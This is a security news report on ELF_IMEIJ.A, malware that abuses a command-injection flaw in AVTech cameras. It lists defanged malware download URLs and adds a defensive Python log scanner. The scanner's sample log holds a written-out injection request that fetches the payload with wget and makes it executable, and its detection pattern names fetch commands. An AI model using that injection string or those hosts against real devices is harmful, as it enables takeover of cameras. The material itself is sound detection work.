Trend Micro is reporting a new threat to Linux-based Internet of Things (IoT) devices that exploits a specific vulnerability in surveillance cameras made by AVTech.
The threat is called ELF_IMEIJ.A and was originally uncovered by Search-Lab in October 2016 and reported to AVTech. Trend Micro said Search-Labs did not receive a response regarding the issue. Much like Mirai, the ELF_IMEIJ.A malware searches for unprotected IoT devices, in this case cameras.
The attacker uses cgi-bin scripts to randomly ping IP addresses searching for a device that is vulnerable.
“Specifically, it exploits CloudSetup.cgi, the reported AVTech CGI Directory vulnerability, to execute a command injection that triggers the malware download. The attacker tricks the device into downloading the malicious file and changes the file's permissions to execute it locally,” Trend wrote.
Search-Labs noted that every user password for the AVTech products is stored in clear text and that an attacker with access to the device itself can easily obtain the full list of passwords.
“By exploiting command injection or authentication bypass issues, the clear text admin password can be retrieved,” Search-Labs' initial report on the malware stated.
The points of entry are IP cameras, CCTV equipment and network recorders that support AVTech's cloud environment. Once installed, the malware is able to execute shell commands, initiate DDoS attacks (like Mirai) and use the infected devices to spread the malware to others on the network.
Trend noted that ELF_IMEIJ.A can be downloaded from three IP addresses, all registered in South Korea and hosted on two separate ISPs:
· xxp://172.247.116.3:8080/Arm1
· xxp://172.247.116.21:85/Arm1
· xxp://192.154.108.2:8080/Arm1
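The two detection opportunities the article describes are the request to CloudSetup.cgi that carries the command injection and the follow-on download from one of the three listed hosts. The script below, an added example that is not from the article or from Trend Micro or Search-Lab, scans web-server access logs from a camera (or a proxy in front of it) for both: it decodes each request target, tags requests to CloudSetup.cgi that contain shell separators or fetch/permission commands, and separately tags any request that references the listed download hosts or the /Arm1 payload path. The log format, the CGI path, the query parameter name and the sample log lines are constructed for the example; the injection heuristic is my own, not a signature published by either company.

```python
import re
from urllib.parse import unquote

# Indicators taken from the article: the three download hosts (the "xxp://"
# scheme is the article's defanging) and the payload path they serve.
IOC_DOWNLOAD_HOSTS = {"172.247.116.3", "172.247.116.21", "192.154.108.2"}
IOC_PAYLOAD_PATH = "/Arm1"

# CGI endpoint the article names as the command-injection vector.
VULN_CGI = "CloudSetup.cgi"

# Heuristic (my own, not from the article): shell separators, command
# substitution, and the fetch/permission commands the article's description
# of the infection implies. Kept narrow to avoid flagging ordinary '&'-joined
# query strings.
INJECTION_RE = re.compile(r"[;|`]|\$\(|\b(?:wget|curl|chmod|tftp)\b")

# Minimal combined-log-format parser. Assumes Apache/nginx-style access logs
# (constructed assumption; AVTech's own logging is not described on the page).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def classify_request(target: str) -> list[str]:
    """Return the detection tags that apply to one decoded request target."""
    tags = []
    if VULN_CGI in target and INJECTION_RE.search(target):
        tags.append("cloudsetup-command-injection")
    if any(host in target for host in IOC_DOWNLOAD_HOSTS) or IOC_PAYLOAD_PATH in target:
        tags.append("imeij-download-url")
    return tags


def scan_log(text: str) -> list[dict]:
    """Scan access-log text and return one finding per suspicious line."""
    findings = []
    for raw in text.splitlines():
        m = LOG_RE.match(raw)
        if not m:
            continue  # unparsable line; a real deployment would count these
        # Decode twice so a double-URL-encoded payload is still inspected.
        target = unquote(unquote(m.group("target")))
        tags = classify_request(target)
        if tags:
            findings.append({"src": m.group("src"), "ts": m.group("ts"),
                             "target": target, "tags": tags})
    return findings


# Constructed sample log. The CGI path (/cgi-bin/CloudSetup.cgi), the "cmd"
# parameter, the status.cgi endpoint and the payload shape are illustrations
# for this example, not details taken from the article.
SAMPLE_LOG = """\
10.0.0.7 - - [12/Mar/2017:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.9 - - [12/Mar/2017:10:01:05 +0000] "GET /cgi-bin/CloudSetup.cgi?cmd=wget%20xxp%3A%2F%2F172.247.116.3%3A8080%2FArm1%3Bchmod%20777%20Arm1 HTTP/1.1" 200 0
198.51.100.4 - - [12/Mar/2017:10:01:09 +0000] "GET /cgi-bin/CloudSetup.cgi?cmd=status HTTP/1.1" 200 77
10.0.0.7 - - [12/Mar/2017:10:02:00 +0000] "GET /cgi-bin/status.cgi?view=all HTTP/1.1" 200 300
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["src"], ",".join(f["tags"]), f["target"])
```

Run against the constructed sample, only the second line is reported, carrying both tags: the CloudSetup.cgi request contains a shell separator and the wget/chmod sequence, and its decoded target embeds one of the listed download hosts. The benign CloudSetup.cgi request is left alone because the heuristic requires an injection pattern, not merely a hit on the endpoint; tuning that threshold is the main trade-off when deploying something like this on a fleet of 130,000 devices. The host check is scheme-independent, so it matches whether the log holds the live URL or a defanged copy.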
Search-Labs reported that AVTech has 130,000 devices connected to the internet.
AVTech was contacted by SC Media, but did not respond.